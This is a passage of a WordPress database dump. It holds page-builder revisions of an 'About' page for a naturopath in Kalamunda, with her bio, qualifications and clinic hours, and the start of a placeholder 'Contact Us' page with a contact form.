20:25:44','2025-04-01 12:25:44','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-04-01 20:25:44','2025-04-01 12:25:44','',27,'https://verdenaturopathy.com.au/?p=441',0,'revision','',0),(421,1,'2025-04-01 10:54:16','2025-04-01 02:54:16','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-04-01 10:54:16','2025-04-01 02:54:16','',27,'https://verdenaturopathy.com.au/?p=421',0,'revision','',0),(164,1,'2021-05-26 14:18:26','2021-05-26 06:18:26','[et_pb_section admin_label=\"section\"]\n [et_pb_row admin_label=\"row\"]\n [et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:pagelayer/pl_post_props {\"post_title\":\"Contact Us\",\"post_name\":\"contact\",\"post_status\":\"publish\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"post_excerpt\":\"\",\"pagelayer-id\":\"dhz1012\"} /-->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"custom\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"image\",\"ele_bg_img\":\"11\",\"min_height\":\"350px\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"ele_margin\":\"-96px,0px,0px,0px\",\"ele_margin_tablet\":\"-87px,0px,0px,0px\",\"ele_margin_mobile\":\"-120px,0px,0px,0px\",\"pagelayer-id\":\"2de4108\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"yso8850\"} -->\n<!-- wp:pagelayer/pl_post_title {\"title_color\":\"#fafafaff\",\"typo\":\",35,,700,,,Solid,,Uppercase,,\",\"align\":\"left\",\"ele_margin\":\"11em,0em,0em,0em\",\"typo_tablet\":\",25,,,,,Solid,,Uppercase,,\",\"pagelayer-id\":\"7je4490\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,4em,0em\",\"ele_padding_mobile\":\"4em,0em,0em,0em\",\"ele_padding_tablet\":\"4em,0em,0em,0em\",\"pagelayer-id\":\"xva9407\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"1kf9806\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eContact Us\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"na83435\"} --><h5>Contact Us</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"heading_typo_mobile\":\",49,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eContact Us\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"d0m3351\"} --><h2>Contact Us</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"uvu8493\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"0bz4538\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"qfb8540\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#111111\",\"heading_typo_mobile\":\",25,,,,,Solid,,,,\",\"text\":\"\\u003ch4\\u003eWrite Us\\u003c\\/h4\\u003e\",\"pagelayer-id\":\"o317574\"} --><h4>Write Us</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_contact {\"form\":\"contact-form\",\"name\":\"Contact Form\",\"form_position\":\"left\",\"space_label\":\",,10,\",\"input_padding\":\"6,10\",\"radio_padding\":\"10,10\",\"field_hover_delay\":\"400\",\"submit\":\"Submit\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"ele_bg_hover_delay\":\"400\",\"placeholder_typo\":\",20,,,,,Solid,,,,\",\"field_border_type\":\"solid\",\"field_border_color\":\"#d9d8d89e\",\"field_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"#eeaa6dff\",\"btn_color\":\"#ffffff\",\"placeholder_typo_mobile\":\",15,,,,,Solid,,,,\",\"placeholder_typo_tablet\":\",16,,,,,Solid,,,,\",\"animation\":\"\",\"animation_delay\":\"600\",\"input_state\":\"normal\",\"con_post_id\":\"4764\",\"form_input_bg\":\"#d9d8d871\",\"field_border_radius\":\"20,20,20,20\",\"field_state\":\"focus\",\"field_border_type_focus\":\"solid\",\"field_border_color_focus\":\"#efba6cff\",\"contact_custom_templ\":\"true\",\"cont_use_html\":\"true\",\"pagelayer-id\":\"pe25980\"} -->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Name:\",\"field_type\":\"text\",\"values\":\"One\\nTwo\",\"field_name\":\"name\",\"field_width\":\"NaN\",\"space_between\":\",,10,\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"field_width_mobile\":\"100\",\"pagelayer-id\":\"gfk9123\"} /-->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Email:\",\"field_type\":\"email\",\"values\":\"One\\nTwo\",\"field_name\":\"email\",\"field_width\":\"NaN\",\"space_between\":\"0,0,10,0\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"field_width_mobile\":\"100\",\"space_between_mobile\":\"0,0,10,0\",\"pagelayer-id\":\"1ia8162\"} /-->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Message:\",\"field_type\":\"textarea\",\"values\":\"One\\nTwo\",\"field_name\":\"message\",\"field_width\":\"NaN\",\"space_between\":\"0,0,10,0\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"textarea_rows\":\"4\",\"field_width_mobile\":\"100\",\"space_between_mobile\":\"0,0,0,0\",\"pagelayer-id\":\"obu4792\"} /-->\n<!-- /wp:pagelayer/pl_contact -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"azf1206\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#111111\",\"heading_typo_mobile\":\",25,,,,,Solid,,,,\",\"text\":\"\\u003ch4\\u003eFrequently Asked Questions\\u003c\\/h4\\u003e\",\"pagelayer-id\":\"dlk6248\"} 